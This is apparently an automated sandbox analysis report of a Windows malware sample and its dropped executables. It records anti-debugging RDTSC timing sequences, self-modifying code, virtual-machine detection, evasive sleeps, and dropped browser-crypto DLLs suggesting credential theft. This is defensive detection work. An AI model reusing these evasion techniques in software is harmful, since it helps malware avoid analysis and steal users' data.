Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02B0 second address: 4EC02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02BF second address: 4EC02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02C3 second address: 4EC02D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02D4 second address: 4EC02D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC02D9 second address: 4EC030A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, C6h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A51h 0x00000015 jmp 00007F0E94F51A4Bh 0x0000001a popfd 0x0000001b movzx esi, bx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC030A second address: 4EC031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC1h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E601E0 second address: 4E601E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4E601E8 second address: 4E60219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0E948C9FC8h 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a movsx edx, si 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC06F8 second address: 4EC06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC06FE second address: 4EC074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e call 00007F0E948C9FBDh 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov si, C06Dh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d call 00007F0E948C9FC6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC074A second address: 4EC07BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edx, 78C2B0E4h 0x0000000a popad 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E94F51A59h 0x00000015 sub ax, 2FD6h 0x0000001a jmp 00007F0E94F51A51h 0x0000001f popfd 0x00000020 jmp 00007F0E94F51A50h 0x00000025 popad 0x00000026 push dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx edi, si 0x0000002f call 00007F0E94F51A56h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC07BC second address: 4EC07D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E948C9FC7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC07D7 second address: 4EC0805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F0E94F51A49h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0805 second address: 4EC0818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0818 second address: 4EC085D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0E94F51A4Ah 0x00000013 jmp 00007F0E94F51A55h 0x00000018 popfd 0x00000019 push esi 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC085D second address: 4EC0863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0863 second address: 4EC0867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC0867 second address: 4EC08EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FBFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 call 00007F0E948C9FBFh 0x00000015 pushfd 0x00000016 jmp 00007F0E948C9FC8h 0x0000001b xor esi, 52B44698h 0x00000021 jmp 00007F0E948C9FBBh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 jmp 00007F0E948C9FC9h 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F0E948C9FC3h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC08EF second address: 4EC090C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	RDTSC instruction interceptor: First address: 4EC090C second address: 4EC0933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E948C9FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E948C9FBCh 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4D17 second address: 5C4D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F30 second address: 5B8F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F39 second address: 5B8F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0E94F51A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F43 second address: 5B8F49 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5B8F49 second address: 5B8F6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0E94F51A55h 0x0000000d jne 00007F0E94F51A46h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D32 second address: 5C3D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D36 second address: 5C3D3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3D3F second address: 5C3D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0E948C9FC0h 0x0000000c jmp 00007F0E948C9FBEh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3EB8 second address: 5C3F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E94F51A55h 0x0000000b jmp 00007F0E94F51A4Bh 0x00000010 jbe 00007F0E94F51A52h 0x00000016 popad 0x00000017 push eax 0x00000018 push ebx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F0E94F51A46h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C3F02 second address: 5C3F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4079 second address: 5C40A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0E94F51A4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E94F51A4Fh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40A1 second address: 5C40A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40A5 second address: 5C40C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A56h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40C1 second address: 5C40C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40C7 second address: 5C40D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E94F51A4Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C40D8 second address: 5C40DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C4625 second address: 5C4639 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E94F51A50h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C6C9B second address: 5C6CEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jns 00007F0E948C9FD0h 0x00000011 push esi 0x00000012 jmp 00007F0E948C9FC8h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D18C5h], eax 0x0000001f push 00000003h 0x00000021 and ecx, dword ptr [ebp+122D2834h] 0x00000027 push 00000000h 0x00000029 mov di, si 0x0000002c push 00000003h 0x0000002e mov edi, eax 0x00000030 call 00007F0E948C9FB9h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	RDTSC instruction interceptor: First address: 5C6CEC second address: 5C6D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E94F51A57h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: ABECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: ABEC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: C9B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: C8145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Special instruction interceptor: First address: CFE86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 5F0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 5F0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F2ECF7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F2EC2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 110B835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 10F145C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Special instruction interceptor: First address: 674853 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: 116E86A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: BD0237 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: BD0678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: C54853 instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: F80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: 2B90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Memory allocated: 1200000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe

Code function: 5_2_04EC0983 rdtsc

5_2_04EC0983

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1125
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1119
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1162
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1146
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1131
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1184
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3508
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3216
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 428
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Window / User API: threadDelayed 3869
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Window / User API: threadDelayed 4566

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\447331\Buyer.pif	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\file.exe

API coverage: 6.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676	Thread sleep count: 1125 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4676	Thread sleep time: -2251125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804	Thread sleep count: 1119 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5804	Thread sleep time: -2239119s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204	Thread sleep count: 1162 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6204	Thread sleep time: -2325162s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920	Thread sleep count: 282 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3920	Thread sleep time: -8460000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096	Thread sleep count: 1146 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 6096	Thread sleep time: -2293146s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828	Thread sleep count: 1131 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5828	Thread sleep time: -2263131s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4304	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448	Thread sleep count: 1184 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5448	Thread sleep time: -2369184s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708	Thread sleep count: 62 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4708	Thread sleep time: -124062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372	Thread sleep count: 57 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3372	Thread sleep time: -114057s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240	Thread sleep count: 242 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5240	Thread sleep time: -7260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896	Thread sleep count: 58 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1896	Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep count: 3508 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep time: -7019508s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5020	Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep count: 3216 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep time: -6435216s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep count: 260 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4072	Thread sleep time: -520260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep count: 428 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1888	Thread sleep time: -856428s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 2748	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe TID: 6648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000028001\build2.exe TID: 8424	Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe TID: 8452	Thread sleep time: -48000s >= -30000s

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F4F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BCB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004139B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E270
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004143F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DC50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	0_2_00414050
